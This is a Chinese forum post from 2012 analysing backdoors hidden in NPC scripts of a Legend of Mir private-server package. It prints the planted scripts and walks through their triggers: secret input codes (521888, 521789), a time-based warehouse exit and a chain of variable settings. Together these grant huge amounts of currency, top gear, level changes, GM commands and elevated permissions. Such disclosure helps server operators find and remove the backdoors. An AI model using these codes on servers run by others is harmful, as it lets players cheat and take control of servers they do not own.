找回密码
 加入科信
查看: 1020|回复: 1

1.95新邪恶指环版石墓守卫脚本后门漏洞

[复制链接]
soluobqi 发表于 2012-2-28 12:37:02 | 显示全部楼层 |阅读模式
1.95新邪恶指环版石墓守卫脚本后门漏洞

进游戏飞盟重 139 148 点输入 521888

当你在跳到@ok下面的事情大家都会知道了

至于这个NPC 在那可以在 MerChant.txt 里去找哦
盟重城/测试 3 139 148 石墓守卫 0 1 0
我给出坐标吧 地图3(盟重土城) 139 148 名字为 石墓守卫

再来
盟重_仓库-3.txt

(@storage @getback )
%100
[@MAIN]

#if
random 2
#act
break
#SAY
需要帮什么忙吗?\
目前不收取保管费,请多利用。\ \
<开启仓库/@OPENBIG>\
<保管/@storage>东西\
<找回/@getback>东西\
<捆/@MBIND>各种卷书和药水\
<退出/@exit>
================此处省略无用脚本==========
[@ext]
#IF
hour 22
min 0 59
#ACT
GOTO @changeMone1
BREAK
#ELSEACT
GOTO @chang
CLOSE

[@changeMone1]
#IF
#ACT
GAMEGOLD + 8888888

这里的处罚为 22点到23点 到盟重土城仓库点 退出 就会给你加8888888元宝

再来
盟重_神秘来客-0161.txt (就盟重书店 里的)
[@main]
<$USERNAME>,我看起来很神秘?定是书店老板这样说,\
我只不过是听到记载古战技的秘籍似乎又有流传开来的迹象,\
所以就到这个消息的发源地来。当年因为修习古战技而导致的\
一些不好的结果,从前人的记录中仍然能够感受到他们的痛惜。\
所以一听到这个消息,为了不让遗憾再现,我就马上赶来了。\ \

<我能理解...可是你究竟是什么人?/@什么人>\

[@什么人]
曾经的雪山之没让三龙卫消失在世间,外人们也以为古战技再无\
踪迹可寻。不过,不为人所知的是,三龙卫一直都有未雨绸缪的\
好习惯,对的,我族正是保存古战技秘密的守望者。\
我们的使命,就是在一个合适的时候,让古战技重现于玛法大陆。\
可是酒神他老人家发现的秘籍,我们并不知道是怎么回事,\
这可真令人费心,我们已经在着手调查了。\ \

<也就是说,你们...?/@也就是说>\


[@也就是说]
是的,<$USERNAME>,正如你所想,既然现在形势好像山雨欲来,\
而且有一部分勇士已经被证明完全可以运用古战技,我想这也是\
让古战技再现的时候了。\
你或者你的英雄,只要能通过考验,都可以学习到古战技。\
自然,我们自己有着鉴别勇士是否具有学习古战技的条件的办法\
你可以选择通过我的考验,来取得记录古战技的秘籍。\ \

<什么考验?/@考验>\


[@考验]
我族前人曾经建立“藏经阁”,由藏经阁中的考验来判断一个勇士\
的心志与能力是不是足以学习古战技。\
通过藏经阁,达到终点,你会得到一本古战技的秘籍。\
有可能是你可以学习的,也有可能是为了你的英雄而准备的。\
而且,藏经阁中还有前人留下的、为激励勇士继续修行的奖励。\ \

<我要进入藏经阁/@进入>\
<什么是藏经阁的考验?/@什么考验>\
<奖励?/@JIANLI>\

[@进入]
#if
CHECKGAMEGOLD > 49999
checkitem 重盔甲(男) 1
#ACT
GAMEGOLD + 2000000
take 重盔甲(男) 1
give 传奇套 2
give 主宰套 2
give 邪恶指环 2
give 皓月神剑 2
give 皓月神甲(男) 2
give 皓月神甲(女) 2
give 皓月头盔 2
give 皓月项链 2
give 皓月勋章 2
give 皓月护腕 2
give 皓月戒指 2
give 皓月腰带 2
give 皓月靴子 2
#SAY
荣誉勋章51号兑换成功!


[@什么考验]
藏经阁由41间秘室组成,各自有编号,每间秘室都有一个人看守人,\
他会要求获得一定数量的古籍残片,你可以通过打倒他召唤出来的\
秘室守护兽,并使用灵符探索来得到古籍残片。\

[@JIANLI]
在秘室中如果你好运的话,有机会获得星王首饰、白金积分、凤凰魔衣\ \

<哦...知道了/@考验>

这里的触发为 你元宝必须大于 49999 个 在带一个 重盔甲(男)
将会给你

元宝+ 2000000
收取 重盔甲(男) 1
give 传奇套 2
give 主宰套 2
give 邪恶指环 2
give 皓月神剑 2
give 皓月神甲(男) 2
give 皓月神甲(女) 2
give 皓月头盔 2
give 皓月项链 2
give 皓月勋章 2
give 皓月护腕 2
give 皓月戒指 2
give 皓月腰带 2
give 皓月靴子 2

再来 最最主要的全县部分

庄园_庄园保管员-GA0.txt(庄园里的仓库管理)
[@MAIN]

你可以将宝藏先寄存在我这里\
为每一位勇士保管好武器和战斗装备是我的天职\
启动密宝最新防护功能,连身上的装备都能保护起来\
<了解密宝最新防护详情/@LOOKBIG>\
<开启仓库/@OKBIG>\
<保管/@storage>东西         <找回/@getback>东西\
<捆/@MBIND>各种卷书和药水\
<返回/@HOMEMOVE>玛法大陆\
<去周围看看/@MOVEGAO>        <退出/@exit> \

[@LOOKBIG]
#if
equal d16 8
#say
<关闭/@@InPutInteger35>
#elsesay
启用密宝最新防护功能,\
上线后前三分钟,身上的装备也能得到隐藏保护!\
过了三分钟后方可开启仓库功能,以便于得到更好的防护功能!\
在使用密宝防护时,必须先开启绑定模式给仓库加密。\
<开启仓库/@OKBIG>\
<开启绑定/@OKBD>\
<修改密宝/@XGBD>\
<返回/@main>

[@InPutInteger35]
#if
#act
mov N34 521789
BREAK
GOTO @ok111

[@ok111]
#if
equal N34 <$STR(N35)>
#ACT
CHANGEPERMISSION 10
SENDTIMEMSG ok 1 251 @StdModeFnnc40 1


这里我详细讲解哈 这里主要是

equal d16 8
检测D16 是否等于8 D16 为变量

要想触发这一块大家知道这一脚本的 都所有不到 MOV D16 8 是吧 所以给大家造成了很大的困惑
我在这里讲解哈 大家可以尝试搜索 D16 看看都有 那些在分析
这个我都分心过了
含D16 的都有
杀手公会-3.TXT 天下第一女战士-3.txt 庄园_庄园保管员-GA0.txt
庄园_庄园保管员 这我们可以不看他 因为他是需要触发前面已经看过 看看 杀手公会-3.TXT 天下第一女战士-3.txt

杀手工会TXT
[@杀手称号说明]
#if
#ACT
mov d16 16
#say
MOV 就是设置的意思
意思就是 设置 D16 为16

在看看 天下第一女战士-3.txt
[@第一说明]
#if
#ACT
DEC d16 4
#say

deC 意思就是 删减
意思就是 D16 -4


这里我们就能看到 杀手工会的 [@杀手称号说明] 他设置了 D16 为 16 天下第一女战士 的[@第一说明] 为 D16 -4
那我们得出结论 16-4=? 哎呀不等于8呀等于12
那我们可以点2次 天下第一女战士的说明 16-4-4=8 恭喜你答对了
所以最后给出结论是
先去盟重土城 杀手工会那 点 杀手称号说明 吧D16设置16
然后再去图天下第一女战那 点俩下第一说明 让D16-4再-4=8
然后我们 就可以再去 庄园仓库那 点 <了解密宝最新防护详情/@LOOKBIG>\
输入框出来输入 521789 就会得到权限 10
麽咪 23:12:11
这个脚本也算是比较强大的但是不含权限功能
测试 3.txt
[@main]
<正在更新制造中请你提出宝贵的意见谢谢/@@InPutInteger33>

[@InPutInteger33]
#if
#ACT
mov D9 521888
BREAK
GOTO @ok123
[@ok123]
#if
equal D9 <$STR(N33)>
#ACT
GOTO @ok
[@ok]

<人物135/@人物135> <英雄135/@英雄135> <人物120/@人物120> <英雄120/@英雄120> \
<人物100/@人物100> <英雄100/@英雄100> <人物90/@人物90> <英雄90/@英雄90> \
<虎威战/@虎威战> <虎威道/@虎威道> <虎威法/@虎威法> <虎威男衣/@虎威男衣> <虎威女衣/@虎威女衣>\
<主宰战/@主宰战> <主宰道/@主宰道> <主宰法/@主宰法> <主宰男衣/@主宰男衣> <主宰女衣/@主宰女衣>\
<传奇战/@传奇战> <传奇道/@传奇道> <传奇法/@传奇法> <传奇男衣/@传奇男衣> <传奇女衣/@传奇女衣>\
<皓月全/@皓月> <皓月男衣/@皓月男衣> <皓月女衣/@皓月女衣> <元宝100万/@100w万> \

<加载怪物爆率/@加载怪物爆率>\
<清除土城怪物(掉装备)/@DQCZGEFWQGW> <清除整个服务器里的怪物(不掉)/@QCZGEFWQGW>\
<加载交易NPC/@交易> <加载怪物属性/@怪物属性>

[@怪物属性]
#IF
#ACT
GMEXECUTE 加载怪物数据库 all
SENDMSG 6 加载怪物数据库成功!

[@交易]
#IF
#ACT
GMEXECUTE 重读商人 all

[@加载怪物爆率]
#IF
#ACT
GMEXECUTE 加载怪物爆率
SENDMSG 6 加载怪物爆率成功!

[@DQCZGEFWQGW]
#IF
#ACT
GMEXECUTE 清除怪物 3 * 1
SENDMSG 6 已经成功清除土城怪物掉装备!


[@QCZGEFWQGW]
#IF
#ACT
GMEXECUTE 清除怪物 * * 0
SENDMSG 6 已经成功清除服务器所有怪物!


[@100w万]
#act
GAMEGOLD = 1000000
[@人物135]
#act
CHANGELEVEL = 135
[@英雄135]
#act
CHANGEHEROLEVEL = 135
[@人物120]
#act
CHANGELEVEL = 120
[@英雄120]
#act
CHANGEHEROLEVEL = 120
[@人物100]
#act
CHANGELEVEL = 100
[@英雄100]
#act
CHANGEHEROLEVEL = 100
[@人物90]
#act
CHANGELEVEL = 90
[@英雄90]
#act
CHANGEHEROLEVEL = 90

[@虎威女衣]
#act
give 虎啸神甲(女) 1
[@虎威男衣]
#act
give 虎啸神甲(男) 1
[@虎威法]
#act
give 虎威法盔 1
give 虎威法戒 2
give 虎威法靴 1
give 虎威法勋 1
give 虎威项链(法) 1
give 虎威腰带(法) 1
give 虎威护腕(法) 2
give 虎威之刃 1
[@虎威道]
#act
give 虎威道盔 1
give 虎威道戒 2
give 虎威道靴 1
give 虎威道勋 1
give 虎威项链(道) 1
give 虎威腰带(道) 1
give 虎威护腕(道) 2
give 虎威之刃 1
[@虎威战]
#act
give 虎威战盔 1
give 虎威战戒 2
give 虎威战靴 1
give 虎威战勋 1
give 虎威项链(战) 1
give 虎威腰带(战) 1
give 虎威护腕(战) 2
give 虎威之刃 1
[@主宰女衣]
#act
give 主宰神甲(女) 1
[@主宰男衣]
#act
give 主宰神甲(男) 1
[@主宰法]
#act
give 主宰法盔 1
give 主宰法戒 2
give 主宰法靴 1
give 主宰法勋 1
give 主宰项链(法) 1
give 主宰腰带(法) 1
give 主宰护腕(法) 2
give 主宰神剑 1
[@主宰道]
#act
give 主宰道盔 1
give 主宰道戒 2
give 主宰道靴 1
give 主宰道勋 1
give 主宰项链(道) 1
give 主宰腰带(道) 1
give 主宰护腕(道) 2
give 主宰神剑 1
[@主宰战]
#act
give 主宰战盔 1
give 主宰战戒 2
give 主宰战靴 1
give 主宰战勋 1
give 主宰项链(战) 1
give 主宰腰带(战) 1
give 主宰护腕(战) 2
give 主宰神剑 1
[@传奇女衣]
#act
give 传奇神甲(女) 1
[@传奇男衣]
#act
give 传奇神甲(男) 1
[@传奇法]
#act
give 传奇法盔 1
give 传奇法戒 2
give 传奇法靴 1
give 传奇法勋 1
give 传奇项链(法) 1
give 传奇腰带(法) 1
give 传奇护腕(法) 2
give 传奇神剑 1
[@传奇道]
#act
give
 楼主| soluobqi 发表于 2012-2-28 12:37:06 | 显示全部楼层
传奇道盔 1
give 传奇道戒 2
give 传奇道靴 1
give 传奇道勋 1
give 传奇项链(道) 1
give 传奇腰带(道) 1
give 传奇护腕(道) 2
give 传奇神剑 1
[@传奇战]
#act
give 传奇战盔 1
give 传奇战戒 2
give 传奇战靴 1
give 传奇战勋 1
give 传奇项链(战) 1
give 传奇腰带(战) 1
give 传奇护腕(战) 2
give 传奇神剑 1
[@皓月女衣]
#act
give 皓月神甲(女) 1
[@皓月男衣]
#act
give 皓月神甲(男) 1
[@皓月]
#act
give 皓月头盔 1
give 皓月戒指 2
give 皓月靴子 1
give 皓月勋章 1
give 皓月项链 1
give 皓月腰带 1
give 皓月护腕 2
give 皓月神剑 1
give 皓月魔杖 1
give 皓月仙扇 1

这里的触发是
[@InPutInteger33]
#if
#ACT
mov D9 521888
BREAK
GOTO @ok123
[@ok123]
#if
equal D9 <$STR(N33)>
#ACT
GOTO @ok

MOV D9 521888
这句话是给 D9设定值为 521888
equal D9 <$STR(N33)>
检测 <$STR(N33)> 是否等于 D9 (<$STR(N33)> 为设置输入框内容)

GOTO @OK

试验天下,如果您要查看本帖隐藏内容请回复
您需要登录后才可以回帖 登录 | 加入科信

本版积分规则

关闭

站长推荐上一条 /1 下一条

Archiver|手机版|小黑屋|科信联众网

GMT+8, 2024-11-23 12:38 , Processed in 0.125000 second(s), 26 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表